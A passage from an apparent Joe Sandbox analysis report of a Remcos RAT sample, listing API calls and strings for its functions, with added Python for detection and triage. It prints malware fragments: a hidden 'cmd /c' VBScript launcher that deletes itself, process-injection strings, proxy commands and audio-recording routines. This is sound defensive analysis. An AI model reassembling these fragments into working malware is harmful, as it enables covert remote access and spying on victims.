                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$PSG$Temp$exepath$open
                                                          • API String ID: 1913171305-1605470806
                                                          • Opcode ID: e25f8157e9f350052b0f4595ec8701be29ea22bdce4a73478e308fb1e33702c0
                                                          • Instruction ID: 0a59ab1ac2652dc6c4b0de1f1bfb113b457f9f33def171b9a9917dadcc9857af
                                                          • Opcode Fuzzy Hash: e25f8157e9f350052b0f4595ec8701be29ea22bdce4a73478e308fb1e33702c0
                                                          • Instruction Fuzzy Hash: 2E416D329101185ACB14F761DC56DFE7779AF50708F10417FF806B31E2EE786A8ACA98
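The strings of the function above are the pieces of a one-shot VBScript. `CreateObject("WScript.Shell").Run "cmd /c ""` ... `""", 0` launches a quoted command through cmd with window style 0 (hidden), and `CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)` removes the script once it has run; the script name is built from `Temp` and `.vbs`, the executable path comes from a value read under HKEY_CURRENT_USER (RegOpenKeyExA with 0x80000001 and 0x20019 = KEY_READ, followed by RegQueryValueExA; `exepath` is among the strings), and ShellExecuteW with the `open` verb starts the script before ExitProcess. The Python below is an added example, not code from this report or from the sample: it scores .vbs files for that stub. The script bodies are constructed from the fragments listed here (the report does not include the dropped file itself) and every path in them is illustrative.

```python
"""Score .vbs files for the hidden-launch / self-delete stub built from the
strings in the function above.

Added example; not code from the Joe Sandbox report or from the sample. The
script bodies below are constructed from the listed fragments (the report does
not include the dropped file itself) and every path is illustrative.
"""
import re

# CreateObject("WScript.Shell").Run "cmd /c ""<command>""", 0
# In VBScript a doubled quote inside a string literal is one literal quote, so
# the launched command is itself quoted; the trailing 0 is the window style
# (hidden). The group captures the command between the doubled quotes.
RUN_HIDDEN_RE = re.compile(
    r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd /c ""(?P<cmd>.*?)""",\s*0', re.I)
# CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
SELF_DELETE_RE = re.compile(
    r'CreateObject\("Scripting\.FileSystemObject"\)\.DeleteFile\(Wscript\.ScriptFullName\)', re.I)
# The function joins 'Temp' and '.vbs' for the script name.
TEMP_VBS_RE = re.compile(r'\\Temp\\[^\\]+\.vbs$', re.I)


def score_vbs(path, body):
    """Return (score, indicators, launched_command) for one script.

    Independent indicators, one point each:
      hidden-run    WScript.Shell.Run of 'cmd /c "..."' with window style 0
      self-delete   FileSystemObject.DeleteFile(Wscript.ScriptFullName)
      temp-dropped  script sits directly under a ...\\Temp\\ directory
    3 is the complete stub; 2 still deserves a look (a benign installer may
    self-delete, but rarely via a hidden cmd /c relaunch out of Temp).
    """
    indicators, cmd = [], None
    m = RUN_HIDDEN_RE.search(body)
    if m:
        indicators.append("hidden-run")
        cmd = m.group("cmd")
    if SELF_DELETE_RE.search(body):
        indicators.append("self-delete")
    if TEMP_VBS_RE.search(path):
        indicators.append("temp-dropped")
    return len(indicators), indicators, cmd


def triage(scripts):
    """scripts: {path: body}. Return [(path, score, command)] for score >= 2,
    highest score first."""
    rows = [(path, *score_vbs(path, body)) for path, body in scripts.items()]
    return sorted([(p, s, c) for p, s, _ind, c in rows if s >= 2], key=lambda r: -r[1])


# Constructed samples assembled from the report's fragments; not the dropped file.
SAMPLE_SCRIPTS = {
    r"C:\Users\u\AppData\Local\Temp\install.vbs":
        'CreateObject("WScript.Shell").Run "cmd /c ""C:\\Users\\u\\AppData\\Roaming\\svc\\svc.exe""", 0\r\n'
        'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\r\n',
    r"C:\Users\u\AppData\Local\Temp\update.vbs":
        'CreateObject("WScript.Shell").Run "cmd /c ""C:\\Users\\u\\AppData\\Local\\Temp\\up.exe""", 0\r\n',
    r"C:\Scripts\backup.vbs":
        'Set fso = CreateObject("Scripting.FileSystemObject")\r\n'
        'fso.CopyFile "C:\\data\\*.csv", "D:\\backup\\"\r\n',
}

if __name__ == "__main__":
    for path, score, cmd in triage(SAMPLE_SCRIPTS):
        print(f"{score}/3  {path}  launches: {cmd}")
```

The captured command is the useful pivot: on a live host it names the executable the RAT re-launches from, which is the same path the function reads back from the registry, so it is worth checking against the HKCU values of the process that wrote the script.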
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: b030283a6c0ce51ba92dd09d555ed862ebb201d4cb761b5ee972a13664eb7e13
                                                          • Instruction ID: 986e8a668492dbee8f9f46891c6c86f5dcf9ebf43b9fca0c5b911ed3811bef24
                                                          • Opcode Fuzzy Hash: b030283a6c0ce51ba92dd09d555ed862ebb201d4cb761b5ee972a13664eb7e13
                                                          • Instruction Fuzzy Hash: 1FC15371D40204BBEB20EAA8CC82FEE77B89B08704F15416AFE45FB282D6749D459768
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                          • closesocket.WS2_32(000000FF), ref: 0040481F
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                          • String ID:
                                                          • API String ID: 3658366068-0
                                                          APIs
                                                            • Part of subcall function 00454860: CreateFileW.KERNEL32(00000000,?,?,;LE,?,?,00000000,?,00454C3B,00000000,0000000C), ref: 0045487D
                                                          • GetLastError.KERNEL32 ref: 00454CA6
                                                          • __dosmaperr.LIBCMT ref: 00454CAD
                                                          • GetFileType.KERNEL32(00000000), ref: 00454CB9
                                                          • GetLastError.KERNEL32 ref: 00454CC3
                                                          • __dosmaperr.LIBCMT ref: 00454CCC
                                                          • CloseHandle.KERNEL32(00000000), ref: 00454CEC
                                                          • CloseHandle.KERNEL32(?), ref: 00454E36
                                                          • GetLastError.KERNEL32 ref: 00454E68
                                                          • __dosmaperr.LIBCMT ref: 00454E6F
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: H
                                                          • API String ID: 4237864984-2852464175
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00419323
                                                          • GdiplusStartup.GDIPLUS(00474AF4,?,00000000), ref: 00419355
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004193E1
                                                          • Sleep.KERNEL32(000003E8), ref: 00419463
                                                          • GetLocalTime.KERNEL32(?), ref: 00419472
                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041955B
                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$VG$VG
                                                          • API String ID: 489098229-455837001
                                                          • API ID:
                                                          • String ID: 65535$udp
                                                          • API String ID: 0-1267037602
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00466554), ref: 0041710A
                                                          • CloseHandle.KERNEL32(00000000), ref: 00417113
                                                          • DeleteFileA.KERNEL32(00000000), ref: 00417122
                                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004170D6
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                          • String ID: <$@$HVG$HVG$TeF$Temp
                                                          • API String ID: 1107811701-3258348784
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004395C9
                                                          • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004395D6
                                                          • __dosmaperr.LIBCMT ref: 004395DD
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439609
                                                          • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439613
                                                          • __dosmaperr.LIBCMT ref: 0043961A
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043965D
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439667
                                                          • __dosmaperr.LIBCMT ref: 0043966E
                                                          • _free.LIBCMT ref: 0043967A
                                                          • _free.LIBCMT ref: 00439681
                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                          • String ID:
                                                          • API String ID: 2441525078-0
                                                          APIs
                                                          • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                          • TranslateMessage.USER32(?), ref: 00404F30
                                                          • DispatchMessageA.USER32(?), ref: 00404F3B
                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00404FF3
                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                          • API String ID: 2956720200-749203953
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00475A50,00000000,004752F0,00003000,00000004,00000000,00000001), ref: 00406647
                                                          • GetCurrentProcess.KERNEL32(00475A50,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe), ref: 00406705
                                                          • API ID: CurrentProcess
                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$peF$windir
                                                          • API String ID: 2050909247-369753874
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419E8A
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419EA1
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419EAE
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419EBD
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419ECE
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419ED1
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          APIs
                                                          • _free.LIBCMT ref: 00446FEF
                                                            • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                            • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                          • _free.LIBCMT ref: 00446FFB
                                                          • _free.LIBCMT ref: 00447006
                                                          • _free.LIBCMT ref: 00447011
                                                          • _free.LIBCMT ref: 0044701C
                                                          • _free.LIBCMT ref: 00447027
                                                          • _free.LIBCMT ref: 00447032
                                                          • _free.LIBCMT ref: 0044703D
                                                          • _free.LIBCMT ref: 00447048
                                                          • _free.LIBCMT ref: 00447056
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 6cab9f7d569f345c7814ae43f5c160195df6b64f63ea78a6b18b8aa73aee7787
                                                          • Instruction ID: 9fec27c2adf71536e74eabd4120179072dbaa777ef3671cded9c13d0800a1e4b
                                                          • Opcode Fuzzy Hash: 6cab9f7d569f345c7814ae43f5c160195df6b64f63ea78a6b18b8aa73aee7787
                                                          • Instruction Fuzzy Hash: 86119B7550011CBFDB05EF55C882CDD3BB5EF05364B9240AAF9494F222DA35DE50EB49
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041BA51
                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041BA95
                                                          • RegCloseKey.ADVAPI32(?), ref: 0041BD5F
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041BA47
                                                          • DisplayName, xrefs: 0041BADC
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnumOpen
                                                          • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                          • API String ID: 1332880857-3614651759
                                                          • Opcode ID: 403d69b7d6150682721d806f011c6d0cce43ad32a20d27b465eebd232eb4432d
                                                          • Instruction ID: 1bcbf0a3cc417a03c0c35e29071d92a42b6db1fb54f2f7a4c144fc0fa0a0a3c2
                                                          • Opcode Fuzzy Hash: 403d69b7d6150682721d806f011c6d0cce43ad32a20d27b465eebd232eb4432d
                                                          • Instruction Fuzzy Hash: 43813F311082409FD324EB11D951AEFB7E8FFD4314F10493FB586921E1EF34AA59CA9A
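The function entries on this page print every resolved call in one fixed shape: a bullet, an optional `Part of subcall function <addr>:` prefix, then `Name.MODULE(args), ref: <call site>` (CRT helpers such as `_free.LIBCMT` carry no argument list). When triaging a Remcos build from such a report it is faster to turn those lines into records than to read them one by one. The Python below is an added example, not part of the Joe Sandbox report and not Remcos code: it parses the bullet lines, separates CRT helpers from Win32 behaviour, and pulls out the inline string arguments (verbs, file names, registry paths) a hunter would pivot on. The sample text is taken from function entries on this page; the category prefix table is an assumption made for the example, not anything the report defines.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One resolved call as printed under "APIs" in a Joe Sandbox function entry:
#   • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00416842
#   • _free.LIBCMT ref: 00447006
#   • Part of subcall function 0041B825: CreateFileW.KERNEL32(...), ref: 0041B83E
API_LINE = re.compile(
    r"^\s*\u2022\s*(?:Part of subcall function (?P<callee>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX32 = re.compile(r"^[0-9A-F]{8}$")

# Prefix table used to bucket Win32 APIs; an assumption for this example,
# not a classification the report itself provides.
CATEGORIES: Dict[str, tuple] = {
    "registry": ("Reg",),
    "file": ("CreateFile", "DeleteFile", "GetModuleFileName"),
    "shell": ("ShellExecute",),
    "network": ("send", "recv", "socket", "connect", "inet_", "WSA"),
    "audio": ("waveIn",),
    "ui": ("Shell_NotifyIcon", "CreateWindow", "RegisterClass", "ExtractIcon"),
}


@dataclass
class ApiCall:
    api: str                      # exported name, e.g. "ShellExecuteW"
    module: str                   # DLL or CRT library, e.g. "SHELL32", "LIBCMT"
    args: List[str]               # raw tokens; "?" means the plugin could not resolve one
    ref: str                      # call-site address inside the dumped image
    callee: Optional[str] = None  # address of the subcall function that makes the call


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the bullet lines of an "APIs" list into ApiCall records.

    Headings and the Memory Dump Source / Similarity lines never match the
    "Name.MODULE ... ref: ADDR" shape, so they are skipped without special-casing.
    """
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref"), m.group("callee")))
    return calls


def categorize(call: ApiCall) -> str:
    """Bucket a call; CRT helpers (LIBCMT/LIBVCRUNTIME) are noise for behaviour triage."""
    if call.module.startswith("LIB"):
        return "crt"
    for name, prefixes in CATEGORIES.items():
        if call.api.startswith(prefixes):
            return name
    return "other"


def summarize(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Map category -> ["Api @ callsite", ...], preserving report order."""
    out: Dict[str, List[str]] = {}
    for c in calls:
        out.setdefault(categorize(c), []).append(f"{c.api} @ {c.ref}")
    return out


def string_args(calls: List[ApiCall]) -> List[str]:
    """Arguments that are neither 32-bit hex, '?' nor empty: the inline strings
    (verbs, file names, registry paths) worth pivoting on."""
    seen: List[str] = []
    for c in calls:
        for a in c.args:
            if a and a != "?" and not HEX32.match(a) and a not in seen:
                seen.append(a)
    return seen


# Lines taken from function entries on this page, in the shape the report prints them.
SAMPLE = """\
APIs
\u2022 ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00416842
  \u2022 Part of subcall function 0041B825: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
\u2022 Sleep.KERNEL32(00000064), ref: 0041686E
\u2022 DeleteFileW.KERNEL32(00000000), ref: 004168A2
\u2022 GetLastError.KERNEL32 ref: 0041CC9C
\u2022 _free.LIBCMT ref: 00447006
Strings
"""

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for cat, items in summarize(parsed).items():
        print(f"{cat:9s} {', '.join(items)}")
    print("strings:", string_args(parsed))
```

Feed the whole "APIs" section of a report to `parse_api_lines` and group by `callee` to see which helper functions are shared between behaviours; `string_args` over the full report gives the registry paths, file names and verbs that the "String ID" lines only show joined with `$`.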
                                                          APIs
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Eventinet_ntoa
                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                          • API String ID: 3578746661-3604713145
                                                          • Opcode ID: 755815a8590020fe67a5e007faf453d0433b6e07d610cf032f2efe3dd928df76
                                                          • Instruction ID: 73c74054356758d85ec5353b0407031f458931cc5dd6312d5a4dd957febfbb04
                                                          • Opcode Fuzzy Hash: 755815a8590020fe67a5e007faf453d0433b6e07d610cf032f2efe3dd928df76
                                                          • Instruction Fuzzy Hash: 5851A4316043005BCA14FB75D95AAAE36A59B84318F00453FF809972E1DFBC9D85C78E
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00416842
                                                            • Part of subcall function 0041B825: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                          • Sleep.KERNEL32(00000064), ref: 0041686E
                                                          • DeleteFileW.KERNEL32(00000000), ref: 004168A2
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                          • API String ID: 1462127192-2001430897
                                                          • Opcode ID: 30589525983727894ad073842d04d74b43d138f664415db5492ece07a2d42c30
                                                          • Instruction ID: c4be9e9118a59201799f54b99a9a171b680bb642a7e99c3b30ff6139130205e5
                                                          • Opcode Fuzzy Hash: 30589525983727894ad073842d04d74b43d138f664415db5492ece07a2d42c30
                                                          • Instruction Fuzzy Hash: 1B313E719001189ADB04FBA1DC96EEE7764AF50708F00417FF946730D2EF786A8ACA9D
                                                          APIs
                                                          • _strftime.LIBCMT ref: 00401AD3
                                                            • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                          • waveInUnprepareHeader.WINMM(00472AC0,00000020,00000000,?), ref: 00401B85
                                                          • waveInPrepareHeader.WINMM(00472AC0,00000020), ref: 00401BC3
                                                          • waveInAddBuffer.WINMM(00472AC0,00000020), ref: 00401BD2
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                          • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                          • API String ID: 3809562944-243156785
                                                          • Opcode ID: 8bc7c709b81e80b1cd26a8133e5bfa918e3c280da4f8c48c3ca11c29a62aef04
                                                          • Instruction ID: b0e15ff03f11dcb3e5bfd7c1448581b7ace3962aa9bffbd159c0990beee9d81b
                                                          • Opcode Fuzzy Hash: 8bc7c709b81e80b1cd26a8133e5bfa918e3c280da4f8c48c3ca11c29a62aef04
                                                          • Instruction Fuzzy Hash: 7E315E315043019FC324EB21DC56A9E77A4FB94314F00493EF559A21F1EFB8AA89CB9A
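Two of the entries above describe collection routines that leave host-side artefacts. The dxdiag entry pairs `ShellExecuteW(open, dxdiag)` with the strings `/t `, `temp` and `\sysinfo.txt`, a read-only `CreateFileW` (desired access 80000000), a 100 ms `Sleep` (0x64) and a `DeleteFileW`: dxdiag is told to write a system-information text file, which is read back and then removed. The audio entry builds its output name with `_strftime("%Y-%m-%d %H.%M")` plus `.wav` and feeds buffers to `waveInPrepareHeader`/`waveInAddBuffer`. The Python below is an added example, not part of the Joe Sandbox report and not Remcos code: two detection rules run over constructed Sysmon-style events. The event field names, user name, paths and the implant's image path are hypothetical, and because the report does not resolve the dxdiag parameter string (the fourth `ShellExecuteW` argument is 00000000), the `/t <temp>\sysinfo.txt` command-line form is inferred from the strings listed in that function.

```python
import re
from typing import Dict, List, Optional

# Constructed Sysmon-style events for this example (not from the sandbox run).
# "process" mirrors event ID 1 fields, "file" mirrors event ID 11; every path,
# the user name and the implant's parent image are hypothetical.
EVENTS: List[Dict[str, str]] = [
    {"type": "process", "image": r"C:\Windows\System32\dxdiag.exe",
     "cmdline": r"dxdiag /t C:\Users\alice\AppData\Local\Temp\sysinfo.txt",
     "parent": r"C:\Users\alice\AppData\Roaming\updater\updater.exe"},
    {"type": "process", "image": r"C:\Windows\System32\dxdiag.exe",
     "cmdline": "dxdiag", "parent": r"C:\Windows\explorer.exe"},  # user opened the GUI
    {"type": "file", "image": r"C:\Users\alice\AppData\Roaming\updater\updater.exe",
     "path": r"C:\Users\alice\AppData\Roaming\updater\2025-01-10 14.37.wav"},
    {"type": "file", "image": r"C:\Program Files\Audacity\audacity.exe",
     "path": r"C:\Users\alice\Music\voice memo.wav"},
]

# dxdiag invoked with /t and an output .txt under a Temp directory; the report's
# entry lists "/t ", "temp" and "\sysinfo.txt" next to the ShellExecuteW call.
DXDIAG_DUMP = re.compile(r"(^|\s)/t\s+\S*\\temp\\[^\\]+\.txt\b", re.IGNORECASE)
# File name produced by strftime("%Y-%m-%d %H.%M") + ".wav", as in the audio entry.
WAV_TIMESTAMP = re.compile(r"\\\d{4}-\d{2}-\d{2} \d{2}\.\d{2}\.wav$")
INTERACTIVE_PARENTS = ("explorer.exe", "cmd.exe", "powershell.exe")


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def check_process(ev: Dict[str, str]) -> Optional[Dict[str, str]]:
    """dxdiag /t <...\\Temp\\*.txt>; escalated when the parent is not a shell a user drives."""
    if basename(ev["image"]) != "dxdiag.exe" or not DXDIAG_DUMP.search(ev["cmdline"]):
        return None
    interactive = basename(ev["parent"]) in INTERACTIVE_PARENTS
    return {"rule": "dxdiag_sysinfo_dump",
            "severity": "medium" if interactive else "high",
            "parent": ev["parent"], "cmdline": ev["cmdline"]}


def check_file(ev: Dict[str, str]) -> Optional[Dict[str, str]]:
    """A .wav whose name is a minute-resolution timestamp matches the recorder's naming scheme."""
    if not WAV_TIMESTAMP.search(ev["path"]):
        return None
    return {"rule": "timestamped_wav_capture", "severity": "medium",
            "writer": ev["image"], "path": ev["path"]}


def run_detections(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply the process rule to process events and the file rule to file events."""
    hits: List[Dict[str, str]] = []
    for ev in events:
        hit = check_process(ev) if ev["type"] == "process" else check_file(ev)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in run_detections(EVENTS):
        print(h)
```

The severity split on the parent process keeps an administrator who runs `dxdiag /t` from a console at medium while an unknown user-profile binary spawning it goes to high; the `.wav` rule is deliberately narrow (exact strftime shape, minute resolution) so it can be paired with the writer's image path rather than firing on every audio file.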
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041CB93
                                                            • Part of subcall function 0041CC2A: RegisterClassExA.USER32(00000030), ref: 0041CC77
                                                            • Part of subcall function 0041CC2A: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CC92
                                                            • Part of subcall function 0041CC2A: GetLastError.KERNEL32 ref: 0041CC9C
                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041CBCA
                                                          • lstrcpynA.KERNEL32(00474B68,Remcos,00000080), ref: 0041CBE4
                                                          • Shell_NotifyIconA.SHELL32(00000000,00474B50), ref: 0041CBFA
                                                          • TranslateMessage.USER32(?), ref: 0041CC06
                                                          • DispatchMessageA.USER32(?), ref: 0041CC10
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CC1D
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                          • String ID: Remcos
                                                          • API String ID: 1970332568-165870891
                                                          • Opcode ID: 7a949f86bc247f3cbdd076edfe2cda77560b6c3ffe772df9fdb29a851d56ec4a
                                                          • Instruction ID: 6591afd7fea275f101bd811abb8745f55115b26a2df550b070e187602390ba30
                                                          • Opcode Fuzzy Hash: 7a949f86bc247f3cbdd076edfe2cda77560b6c3ffe772df9fdb29a851d56ec4a
                                                          • Instruction Fuzzy Hash: 130112B1940344ABD7109BA5EC4DFEABBBCA7C5B05F004029E615A2061EFB8E585CB6D
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b79e0bacf68e79f56bbfbff6a95aeb92d11d955db7cfd18af0a5c0e52fbe5259
                                                          • Instruction ID: 8081305e108bfff8a8e14cd18a234b42858a69a1a1930647e7f2335dd99175ec
